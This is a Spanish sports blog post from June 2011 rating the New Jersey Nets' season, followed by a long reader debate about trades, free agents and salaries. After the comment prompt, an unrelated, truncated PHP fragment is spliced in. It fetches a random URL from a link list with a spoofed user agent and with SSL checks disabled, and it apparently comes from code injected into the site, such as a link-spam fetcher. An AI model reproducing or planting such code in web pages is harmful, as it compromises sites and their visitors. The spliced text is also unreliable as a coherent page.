New Jersey Nets: Suspenso

23 de June de 2011 por telekoman

¿Podríamos decir que un año con sólo 24 victorias se podría considerar de otra forma que con un suspenso? Podría ser. Tras la decepción de la elección de Miami por parte de Lebron, los Nets del magnate Prohkorov trabajaron intensamente para añadir a su plantilla a una superestrella. Tras varias negativas de otros jugadores, los Nets consiguieron hacerse con los servicios de Deron Williams al menos hasta el Junio del 2013, año en el que finaliza su contrato actual. Pero la magia de Deron llegó algo tarde y sólo pudo disputar 10 partidos de la temporada regular, cuando ya todo estaba decidido. Aún así le dio tiempo a hacer 15 puntos y casi 13 asistencias de media.

Hasta ese momento el equipo se sujetaba a duras penas gracias al talento ofensivo de Brook López, la dirección correcta de Devin Harris, el rebote aportado por Kris Humpries y a las ganas de Anthony Morrow. Devin Harris y el novato Derrick Favors fueron la moneda de cambio para obtener a Deron. El precio no estuvo mal aunque se perdiera el futuro de Favors.

Brook López ha hecho una temporada muy buena consiguiendo gran parte de los puntos de su equipo. Claro que o era él o ahí no metía puntos nadie.  Aún así, más de 20 puntos de media no los consigue cualquiera. Su mayor pero está en el rebote. Es un aspecto en el que debe mejorar claramente, por que no siempre va a tener un 4 como Humpries que le pueda sacar las castañas del fuego.

En el aspecto negativo debemos destacar a Travis Outlaw. El atlético alero ha sido una de las grandes decepciones de la temporada. En un equipo con un escaso poder anotador, el ex jugador de Portland no ha sido capaz de rentabilizar los 7 kilos de salario que ha ganado este año. Creo que es un jugador al que se le debe exigir más.

Lo mejor: Que la llegada de Deron permite ser más optimistas respecto al futuro, y más teniendo en cuenta que en el otro extremo hay un jugador como Brook que podrá aprovechar su magia.

Lo peor: Que para que Deron no se vaya dentro de 2 temporadas será necesario darle algo más y no va a ser nada fácil de conseguir, visto el erial en el que se ha convertido la plantilla.

Jugando a GM:

– Junto a Deron vino Gadzuric con un contrato bajo el brazo de 7 kilos que afortunadamente ha acabado. Adiós y mucha suerte para el futuro. Lamentablemente no podemos decir lo mismo del contrato de Outlaw. Le quedan 4 años más a razón de 7 kilos por año.  No está nada mal. Los 7 millones de este año han reportado 9 puntos, 4 rebotes y 1 asistencia de media. Me parece muy poco. Lamentablemente intentar colocar a este individuo va a ser tarea imposible. Hay que tratar de involucrarle en el juego, ahora que está Deron a los mandos.

– De todas maneras, intentaría buscar un equipo que estuviera dispuesto a adoptar el enorme contrato de Outlaw. Lamentablemente creo que para ello haría falta meter en el paquete a un jugador como Anthony Morrow. También Farmar podría ser traspasado sin excesivos problemas. A cambio intentaría llevarme un 3 importante, aunque fuera algo más caro para intentar hacer una base decente. Se podría intentar traerse a Danny Granger pero habría que involucrar mucho futuro en ello. Las rondas de este año de los Nets son bastante malas (27 y 36) así que seguramente habría que involucrar rondas de otros años.

– Yo renovaría a Kris Humpries teniendo en cuenta el escaso afecto que siente Brook por el tema de los rebotes. Es importante tener en este caso un 4 que supla esas carencias aunque no sea una máquina anotando. Estaba cobrando algo más de 3 millones, por lo que su contrato se nos va a ir a los 6 o 7 como poco.

– También se nos acaba el contrato de Vujacic. Lamentablemente no renovaría al  bueno del balcánico.

– Intentaría contratar algún especialista defensivo tipo Shane Battier que queda libre este año, ya que el equipo es uno de los peores en este apartado.

Comenta

24 comentarios a esta entrada

  1. Vader dice:
    #1

    Para conseguir a Deron soltaron a Harris, Favors y rondas del draft. Con una de ellas Utah elegira hoy en la tercera posición… Ya pueden convencer a Deron para que renueve porque si no menuda ruina de traspaso…

    Saludos

      Citar

  2. TheDeerHunter dice:
    #2

    Por más que nos rasguemos las vestiduras luego, es una ley no escrita que los buenos jugadores atraen a los buenos jugadores. Ahí hay que encuadrar el trade de Deron, y hay pocas apuestas mejores para ese objetivo. Luego, claro, habrá que hacer algo más pero es un primer paso y un buen mensaje respecto a las intenciones del magnate ruso. Eso sí, tiene fecha de caducidad si no se mueven rápido.
    Devin Harris, al menos a las órdenes de Avery Johnson, sólo ha demostrado ser un base “correcto” como ha señalado el análisis. Creo que todos esperábamos una progresión muy distinta tras su temporadón hace tres temporadas. Un poco estancadísimo que diríamos por aquí. Necesitaba un cambio de aires.
    De Favors, el nuevo Malone decían, pues ni rascarla… tiene narices dejar un proyecto joven en manos de un técnico como Johnson.
    El análisis también habla de Brook Lopez. No estoy de acuerdo con eso de “ha hecho una temporada muy buena”. Sí, mucho mérito anotar más de 20 puntos y más en uno de los equipos más torpes de la liga en ese aspecto, pero bajar de casi 9 rebotes a 6 no tiene nombre. A mí me ha decepcionado un poco y ya puede besar por donde pisa Humphries.

    Teniendo en una de las grandes decepciones a Outlaw (aunque algunos nos olíamos que este tipo es lo peor) y como destacados a gente del perfil de Farmar, Vujacic, Morrow y el propio Humphries el equipo es actualmente un desastre en manos de alguien que no es santo de mi devoción. Sin embargo ha duplicado el número de victorias y parece intuirse que Prohkorov quiere cumplir con sus promesas megalómanas. Veremos como se mueven.

    Jugando a GM yo renovaría a Humphries, como dices, pero no a cualquier precio. Alrededor de los 7 me parece bien, teniendo en cuenta que Outlaw los cobra tocándoselos a dos manos. También creo que Vujacic se puede renovar, porque entiendo que no entra en sus planes mantener su estátus de 5 por año. Yo creo que debe de bajarse los pantalones como mínimo hasta las rodillas o venirse para Europa.

    Ahora mismo habría 40 kilos comprometidos a expensas de las renovaciones. Entiendo que les quedará unos 10 milloncetes para intentar captar a alguien más mínimos y excepciones.
    Suena el nombre de West, que me parecería una buena opción para subir ese mal ratio ofensivo que tienen. Habría alguna fórmula para traerlo sin necesidad de desprenderse de Humpries (dependiendo de las aspiraciones económicas de ambos, claro) Si la cosa se encarece mucho se me ocurre que podrían ir a por Landry. También podrían intentar reforzar el perímetro con Butler o Tayshaun Prince, todos encantados de poner el cazo en un proyecto aparentemente ascendente. En mi opinión estan obligados a ser ambiciosos desde esta misma temporada y eso tiene un precio.

    Pensando en lo que me parece más probable podría quedar algo así para este año:
    – Deron/Farmar
    – Morrow/¿Vujacic?
    – Prince/Outlaw/D. James
    – Humphries/¿Wright?/Graham
    – Lopez/Petro

    Haría falta un interior veterano más e igual pueden rascar posiciones de playoffs esta misma campaña.

      Citar

  3. CAMPO2 dice:
    #3

    Como fan y GM virtual:
    -Me crujo a Avery y ficho a Adelman
    -Renuevo a Humpries que entre su novia y Beyonce le dan publicidad al equipo eso si 6 millones y vale.
    -Le ofrezco 10 millones a wilson chandler de Denver que es agente restringido y con un poco de suerte los Nuggets no igualan porque pasan de paga 3 y pico millones a 10 millones.
    -Propongo cambio a Utha de Outlaw + Farmar por Millsap y CJ Milles, al tener Utha a Favors y estar en reconstrucción me imagino que querran darle minutos para que espabile por lo que Millsap le corta el paso, outlaw es un Alero que con la baja de Kirilenko(que se subira a la parra pidiendo pasta y se querra ir a un equipo aspirante) puede colar y le incluyes en el pack a Farmar para que tengan un buen base suplente. Si no cuela les cambio a Outlaw y Farmar po Al Jefferson que parece que hay rumores de traspaso.
    -Le ofrezco a JR smith la bi-anual que es agente libre.
    -Ficharia un base suplente veterano para dar minutos de descanso a Deron
    Quinteto:
    Williams, JR Smith, Chandler, Millsap/jefferson , Lopez

    Suplentes:
    Base veterano, Morrow, Graham, Humpries y Petro

      Citar

  4. Esteban dice:
    #4

    si los nets no hacen algo grande desde esta temporada, se ira en la proxima, boston esta haciendo espacio enorme en su tope y los knicks lo estan esperando
    por lo tanto desde ya deben hacer algo interesante, pero muy interesante

    de entrada una ofera a wilson chandler, pocos antes libres de su nivel hay este año

    a otra seria fichar a vince carter como sexto hombre, con una exepcion de nivel medio, q les puyde dar descanso a morrow, q po su salario es impresindible, y dar la chance a outlow de mejorar, con semejante contrato nadie lo va a querer

    renovar a humpries para que salte desde la banca, e ir con todo por david west

    deron- farmar
    morrow- vince carter
    outlaw
    west- humpries
    lopez-petro

    con este equipo, todos rindiendo bien, tendrian alguna chance de entrar a play offs y no se comprometeria demasiado salario para el proximo año

    la otra es hacer un cambio radicil y cambiar todo el equipo, buscar traspasos para famar, humpries, outlaw y petro, a cambio de contratos por acabarse y pensar en una buena agencia libre el proximo año

      Citar

  5. CAMPO2 dice:
    #5

    Me gusta la idea de Vince Carter que sera cortado si o si por phoenix antes del dia 30 de junio, y si no consigue un contrato de veterano en un equipo aspirante al anillo una bi-anual o cosas de esas no creo que la desprecie

      Citar

  6. Vader dice:
    #6

    Sinceramente creo que la única opción real de que Deron se quede es conseguir el traspaso durante el próximo año de Howard. Si se juntan los dos, Deron y Howard en los Nets, es muy posible que firmen extensiones de contrato para liderar juntos un proyecto al título. Si los Nets no consiguen algo así de gordo habra muchos equipos pujando por Deron y los Nets lo traspasaran antes de quedarse sin el jugador ni nada a cambio…

    Saludos

      Citar

  7. Esteban dice:
    #7

    howard no va a dejar orlando por un equipo q no entre a play offs por mas deron williams q tenga, mas teniendo boston 40 millones para gastar en el tope, y q pueda renovar por el minimo a allen y garnet, incluso veo un plantel de boston asi:

    deron o paul
    allen
    pierce
    garnett
    howard

    y le quedaria espacio para un par de bueno jugadores como green, west y alguno mas que se pueda conseguir en un traspaso por rondo, ojo

    los nets, tienen que oler otro rio revuelvo, podria ser utha que este dispuesto a deshacerse de sus activos e inicar una recontruccion, los hornets los bobcats o los bucks y traer jugadores secundarios q puedan ayudar a deron y asi incentivar a hoiward

    yo me desprenderia de todo el equipo, incluso lopez para ir por howard

    gooden, corey magorette, ariza, west, stephen jackson, es decir dejar de este equipo a deron y morrow, trapasar todo el resto por algunas piezas utilizables a pueda adyudar a deron y dejen espacio para q howard firme

    habria q armar dos pacs para que sea redituable y otros equipos los acpeten

    en uno tiene q estar morrow y en otro lopez y con ellos enganchar otros contratos

    a lopez le sumo a outlow y petro: seria un total de salario de 15 millones, podrian llegar dos jugadores mas productivos, es una pena perder a lopez, pero no hay otra forma de desacerse de los 7 millones al año de outlow: un escolta y un alero de cierto nivel, podrian llegar salmons, gooden y alguno mas

    a morrow, le sumo a farmar, aqui son 8 millones interesantisimos para conseguir un david west

    completar el plantel con algunos veteranos, uno podria ser vince carter y otros por el minimo y rookies

    asi si tendria varios jugadores importantes, aunque seria un plantel cortisimo, pero no hay otra forma de hacer de este equipo, repleto de contatros largos y caros (farmar 4, outlow 7, petro 4 por varios años) trasformarlo en dos años en una franquicia interesante para fichar a alguien como HOWARD

      Citar

  8. HisRoyalAirness dice:
    #8

    Esteban, eres consciente de lo que estás diciendo? Sabes los salarios del quinteto que has puesto? Es que Garnett solo ya cobra sobre 20 y Ray Allen ya está renovado…

      Citar

  9. Esteban dice:
    #9

    hisroyal amigo, soy mas que conciente del salario q eh puesto, te comento q tanto allen como garnett al finalizar este curso terminan sus contratos, al igual que howard, deron u cris

    ya quedo demostrado este año q garnet y allen como estrellas no pueden guiar a los celtics a un nuevo titulo, por lo q creo q ambos renovaran por poquitisimo, sino el minimo, q edad tiene cada uno? 35 y 36 años? van a renovar por poco para hacer un eqwuipo ams competitivo

    deron 15 millones
    allen creo q renovaria por unos 3 millones
    pierce 15
    garnett otros 3 o 4 millones
    howard 20

    si es q howard y deron no bajan sus pretenciones con tald e jugar en estew equipo

    suplentes, podria ser green, west y los jugadores q consigan por un traspaso de rondo y sus 11 millones

    te comento amigo mio hisroyal, que al dia de hoy boston tiene comprometidos solo 29 millones en salario, incluye eso a pierce y los 11 millones de rondo

    si salen de rondo por dos jugadores que vayan al banco de suplentes, tienen 40 millones para esos 4 jugaores que nnombre antes

    hoy boston gasta al año 83 millones…

    entiendes ahora querido amigo? ves q tenia idea de los salarios de los q hablaba?

      Citar

  10. Esteban dice:
    #10

    quiza estes confundido, pero estoy hablando de la temporada, 12/13 cuando estos jugadores sean agentes libres

      Citar

  11. TheDeerHunter dice:
    #11

    Por muy agentes libres que sean esos salarios no se ajustan a la realidad. Creo que Deron y Howard cobrarán el máximo cuando llegue el momento, como no puede ser de otra forma. También creo que ni Allen ni Garnett van a jugar por 3 kilos. Antes vendría la retirada de ambos, que la veo mucho más posible.

    De todas formas ya hablaremos si acaso de eso cuando llegue el momento. Este es el post de los Nets. En este caso no me parece correcto el offtopic.

      Citar

  12. CAMPO2 dice:
    #12

    Aun se haran los Nets con Kirilenko que es agente libre y al ser ruso igual lo ficha

      Citar

  13. TheDeerHunter dice:
    #13

    Jeje… el ruso tiene suerte
    Con el nivel del mercado de agentes libres este año lo mismo se lo van a rifar y todo
    Aún pillará otro contratazo, ya veréis.

      Citar

  14. CAMPO2 dice:
    #14

    Seguro que de 8 por año no baja, tambien estan Jamal Crawford o JR Smith y como restringidos marcus Thorton, Marc Gasol y Wilson Chandler. Seguro que me dejo alguno pero estos me parecen de lo mejor de la agencia libre

      Citar

  15. Esteban dice:
    #15

    hunter realmente crees que garnet y allen preferirian retirarse que jugar por el minimo, junto a deron y howard? vamos amigo, buscate otra excusa
    si howard busca un titulo, 20 millones es una buena cifra y llegaria a un equipo con grandes aspiraciones

    digo yo deron, pero aun asi podria jugar rondo de base q tiene contrato, pero creo q necesitan a paul o deron de base, y conseguir jugadores con el dinero de rondo

    sigues diciendo q no se ajusta a la realidad?

      Citar

  16. TheDeerHunter dice:
    #16

    Sigo diciendo que el sueldo de Deron y Howard se va a acercar más a 25 que a 15 como ponías antes. Es más, apostaría algo. Y dudo muy mucho que Garnett y Allen se bajen los pantalones hasta los tobillos de esa manera por mucho amor a los colores y ansias de anillos que se supone puedan tener.

    Puestos a fantasear creo que el año que viene Howard irá a los Lakers cobrando la Mid-Level… o a Miami. Y Deron la Bianual…
    Un quinteto Deron-Wade-LeBron-Bosh y Howard podría garantizar algún anillo. Igual Garnett y Allen también se animan a cambiar de acera cobrando el mínimo… XD

    No te lo tomes a mal, Esteban, pero diría que nos estamos pasando con la especulación.

      Citar

  17. Txusma dice:
    #17

    David West y Marc Gasol creo que son las perlas que quedan libres ahora mismo.

    Sobre las especulaciones: Lebron, Wade y Bosh cobran este año menos de 15 kilos. Y no llegarán a los 20 hasta las 2013/2014. Y por el otro lado, Karl Malone pasó de cobrar más de 19 kilos en Utah a cobrar 1’5 en Los Angeles. No es lo normal pero yo ya me creo cualquier cosa. No me sorprendería que Deron y Howard renunciaran a cobrar el máximo por jugar el máximo y que Garnett y Allen pasarán a cobrar un par de kilos cada uno. Lo del mínimo me parece pasarse.

      Citar

  18. TheDeerHunter dice:
    #18

    Howard y Deron cobran ya los 15 kilos. Pensar que van a firmar un contrato de 15 kilos el año que viene me parece de un subrealismo cuasi-cómico.

      Citar

  19. Esteban dice:
    #19

    lebron, wade y bosh, bajaron enormemente sus salarios para jugar juntos

    ademas, si lees bien, a howard le doy 20 millones, no 15, defiende tu postura sin mentir
    deron no va a conseguir equipo con alguna aspiracion a un titulo si pretende 20 millones, los knicks tanto a el y a paul solo pueden ofrecer 14, q es lo q deja vacante billups

    esta claro?

    bajarse los pantalones garnet y allen? no me parece, tendran 37 años en el 2012, y sus numeros habran bajado al final de esta temporada, POR Q CREES QUE SUS CONTRATOS TERMINAN ESTE AÑO?

    creo q ambos bajaran sus pretenciones, como tamb seguoiran bajando su produccion y numeros

    ahora te pregunto, q equipo puede ofrecerle 25 millones a howard y tener un plantel para salir campeon? orlando? lakers? lo dudo

    mas aun a deron, ni los nets, si pretenden incoporar a howard pueden ofrecerle 20 millones al año, simplemente no los vale

    lo de malone es un claro ejemplo, incluso cambio de camista, allen y garnett nisiquiera deben hacerlo

    ademas querido, si sabes leer, te dije, SI QUERES QUEDATE CON RONDO DE BASE Q COBRA 11 MILLONES Y YA TIENE CONTRATO, y aun asi, boston tendria espacio para howard, informate si quieres

    un dato mas… DOC RIVERS, RENOVO CONTRATO POR 5 AÑOS, Y POR UN SALARIO RELATIVAMENTE BAJO, 5 AÑOS PARA UN EQUIPO DE JUGADORES DE 36 AÑOS? ALGO PASO EN LA REUNION CON RIVERS, Y CREO Q ESTAN IDEANDO EL DESEMBARCO DE HOWARD

    el tiempo dira, puede suceder o no, pero es logico lo que planteo, incluso si no fichan a howard, LAS OFERTAS PARA ALLEN Y GARNET NO SERAN SUPERIORES A LSO 6 O 7 AL AÑO,

    tu trasgiversacion de mis palabras es cuasi-comica…

      Citar

  20. TheDeerHunter dice:
    #20

    que sí, que sí…

    Deron-Rondo
    Allen-West
    Pierce-Green
    Garnett-Davis
    Howard

    ¿alguien más? ya que están podrían convencer a Marc para hacer de suplente. Un anillo vale cualquier sacrificio.
    … hiperrealista…

    Según tú ¿Cuanto es bajarse enormemente el salario? En la 2015/16 entre los tres angelitos de Miami van a cobrar 66 millones de dólares ellos solitos…

    Y tranquilo hombre, que estamos hablando…

      Citar

  21. Esteban dice:
    #21

    amigo, deberias leer lo que puse, EL TEMA ES RONDO O DERON!!! nunca los dos juntos, estas loco? los dos juntos ajjajajajajajajajajajaja
    si quieres ya te dije, deja fuera del equipo a deron, y que se quede rondo que ya tiene contrato por 11 millones, sino lo traspasas y usas esos 11 millones en otros jugadores o en el propio deron mas algo mas de dinero
    echa un vistazo:
    http://www.hispanosnba.com/salarios/equipos/boston-celtics

    realmente crees que despues de terminas en semiufinal del oeste en 2011, garnett espera cobrar 20 millones en 2013? entiendes lo que estas hablando? va a tener 37 años, y sus numeros andaran por los 15 puntos y 7 rebotes, si no lo apremian las lesiones
    o allen esperara cobrar en 2013, con 37 años 10 millones, por 15 puntos que promedio en 2011, y al 2013 llegaran apenas por ensima de los 10 por partido

    lo que dices de miami es cierto, y nadie te lo niega, es una buena forma de salirse del tope, tranquilamente howard tamb podria firmar 20 millones la 2012/13 e ir aumentando su salario año a año, hasta llegar a los 30 para el 2017, y estariamos en la misma

    el resto de jugadores q nombras, WEST no es una superestrella ni mucho menos, dudo q cobre fortunas, si se haria un gran contrato a green, quiza no alcanze para davis

    tranquilo amigo, si no tienes razon no hay problema, es cuestion de informarse y saber especular!

      Citar

  22. TheDeerHunter dice:
    #22

    Pues qué quieres que te diga. Este debate ha surgido a partir del hipotético destino de Deron Williams. Me parece bastante improbable que a los Celtics se les pase por la cabeza largar a Rondo, así que efectivamente había entendido que te referías a los dos juntos y me parecía tan locura como tú mismo indicas.

    Del resto… pura especulación como dices y un offtopic como un piano de grande en este post. Así que si no te parece mal lo dejamos aquí y seguiremos hablando cuando lo hagamos de los Celtics.

      Citar

  23. Esteban dice:
    #23

    perfecto, me ah enctandfo discutir contigo hunter, me ofusque un poco porque desde el primer post que hice, aclare que rondo no tenia lugar en este equipo, era el o deron, pense q lo habias notado e insistias que era una locura
    aun asi, sigo creyendo que garnet y allen bajaran sus sueldos y ficharan a una mega estrella por lo menos para la 2012/13, y si no quieren firmar por menos ninguno de los dos seguira y ahy si iran por howard

    es decir, o por mucho menos dinero o afuera de boston, boston no va a gastar millonadas en dos veteranos como jugadores franquicia que este año ya demostraron que no pueden volver a llevarlos al titulo

    tampoco creo q ningun club le ofrezca 20 kilos a garnet a los 37… pero bueno, en un año hablamos y veremos quien tenia razon

      Citar

  24. TheDeerHunter dice:
    #24

    Pues según se dice… Deron Williams al Besiktas en el lockout

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>